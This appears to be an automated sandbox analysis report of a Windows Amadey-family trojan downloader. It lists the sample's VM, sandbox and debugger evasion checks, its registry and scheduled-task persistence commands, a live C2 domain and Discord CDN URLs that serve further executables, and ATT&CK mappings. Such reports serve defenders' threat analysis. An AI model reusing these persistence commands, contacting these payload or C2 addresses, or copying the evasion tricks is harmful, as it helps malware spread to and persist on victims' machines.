              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Query firmware table information (likely to detect VMs)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5664Thread sleep time: -56000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5684Thread sleep count: 64 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5684Thread sleep time: -1920000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 408Thread sleep count: 394 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 408Thread sleep time: -23640000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6320Thread sleep count: 367 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6320Thread sleep time: -22020000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 4476Thread sleep count: 213 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 4476Thread sleep time: -12780000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5068Thread sleep count: 72 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 5068Thread sleep time: -4320000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe TID: 6296Thread sleep count: 43 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeWindow / User API: threadDelayed 394Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeWindow / User API: threadDelayed 367Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01280D00 sldt word ptr [eax]3_2_01280D00
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeSystem information queried: ModuleInformationJump to behavior
              Source: rnyuf.exe, 00000003.00000003.678494220.0000000001210000.00000004.00000001.sdmp, rnyuf.exe, 0000000A.00000003.703857458.0000000001240000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__0!{
              Source: rnyuf.exe, 00000003.00000003.678691177.0000000001210000.00000004.00000001.sdmp, rnyuf.exe, 0000000A.00000003.704119363.0000000001240000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__0!{
              Source: rnyuf.exe, 00000003.00000003.678560066.0000000001210000.00000004.00000001.sdmp, rnyuf.exe, 0000000A.00000003.704066055.0000000001240000.00000004.00000001.sdmpBinary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__0!{

              Anti Debugging:

              barindex
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01251DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetUserNameW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_01251DA0
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_012621C1 mov eax, dword ptr fs:[00000030h]3_2_012621C1
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01265F52 mov eax, dword ptr fs:[00000030h]3_2_01265F52
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugObjectHandleJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01252A20 ShellExecuteA,3_2_01252A20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /FJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\Jump to behavior
              Source: rnyuf.exe, 00000003.00000002.945137424.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: rnyuf.exe, 00000003.00000002.945137424.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: rnyuf.exe, 00000003.00000002.945137424.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: rnyuf.exe, 00000003.00000002.945137424.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vms\vms.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vms\vms.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\slhost\slhost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\slhost\slhost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_0125FCF9 cpuid 3_2_0125FCF9
              Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 3_2_01251DA0 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetUserNameW,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_01251DA0

              Stealing of Sensitive Information:

              barindex
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000003.00000002.946875767.00000000048F5000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.943681294.0000000000E23000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.943646127.0000000000DE9000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882574918.00000000048C6000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.882522004.00000000048B3000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.810169410.0000000000E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.744803770.0000000000E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rnyuf.exe PID: 5824, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScheduled Task/Job1Scheduled Task/Job1Exploitation for Privilege Escalation1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Process Injection12Modify Registry1LSASS MemorySecurity Software Discovery531Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Process Injection12NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery22Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 520871 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 12/11/2021 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 8 SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe 4 2->8         started        12 rnyuf.exe 2->12         started        14 rnyuf.exe 2->14         started        process3 file4 31 C:\Users\user\AppData\Local\...\rnyuf.exe, PE32 8->31 dropped 55 Query firmware table information (likely to detect VMs) 8->55 57 Hides threads from debuggers 8->57 59 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->59 16 rnyuf.exe 20 8->16         started        signatures5 process6 dnsIp7 33 depressionk1d.ug 178.208.83.45, 49782, 49783, 49786 VDSINA-ASRU Russian Federation 16->33 35 cdn.discordapp.com 162.159.129.233, 443, 49784, 49785 CLOUDFLARENETUS United States 16->35 37 Multi AV Scanner detection for dropped file 16->37 39 Query firmware table information (likely to detect VMs) 16->39 41 Tries to detect sandboxes and other dynamic analysis tools (window names) 16->41 43 4 other signatures 16->43 20 cmd.exe 1 16->20         started        22 schtasks.exe 1 16->22         started        signatures8 process9 process10 24 reg.exe 1 20->24         started        27 conhost.exe 20->27         started        29 conhost.exe 22->29         started        signatures11 53 Creates an undocumented autostart registry key 24->53

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe71%VirustotalBrowse
              SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe79%ReversingLabsWin32.Downloader.Deyma
              SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe79%ReversingLabsWin32.Downloader.Deyma

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              depressionk1d.ug10%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://depressionk1d.ug/k8FppT/index.phpoAnm0%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php?scr=122q20%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php?scr=10%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php332190%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.phpncoded0%Avira URL Cloudsafe
              https://displaycatalogg/k8FppT/index.php0%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php0%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php?scr=1f00%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php?scr=1S00%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.phpMT0%Avira URL Cloudsafe
              http://depressionk1d.ug/k8FppT/index.php3321961m30%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cdn.discordapp.com
              		162.159.129.233
              		truefalse
                		high
                depressionk1d.ug
                		178.208.83.45
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exefalse
                  		high
                  https://cdn.discordapp.com/attachments/878034206570209333/908810887417176084/vms.exefalse
                    		high
                    http://depressionk1d.ug/k8FppT/index.php?scr=1true
                    • Avira URL Cloud: safe
                    		unknown
                    http://cdn.discordapp.com/attachments/878034206570209333/908810887417176084/vms.exefalse
                      		high
                      http://cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exefalse
                        		high
                        http://depressionk1d.ug/k8FppT/index.phptrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://depressionk1d.ug/k8FppT/index.phpoAnmrnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.php?scr=122q2rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.php33219rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.phpncodedrnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://displaycatalogg/k8FppT/index.phprnyuf.exe, 00000003.00000003.810127910.000000000488B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://depressionk1d.ug/k8FppT/index.php?scr=1f0rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.php?scr=1S0rnyuf.exe, 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.phpMTrnyuf.exe, 00000003.00000003.756308778.000000000486C000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://depressionk1d.ug/k8FppT/index.php3321961m3rnyuf.exe, 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        178.208.83.45
                        		depressionk1d.ugRussian Federation
                        		48282VDSINA-ASRUtrue
                        162.159.129.233
                        		cdn.discordapp.comUnited States
                        		13335CLOUDFLARENETUSfalse

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:520871
                        Start date:12.11.2021
                        Start time:22:21:56
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 19s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:SecuriteInfo.com.Trojan.Siggen15.38099.19640.25720 (renamed file extension from 25720 to exe)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
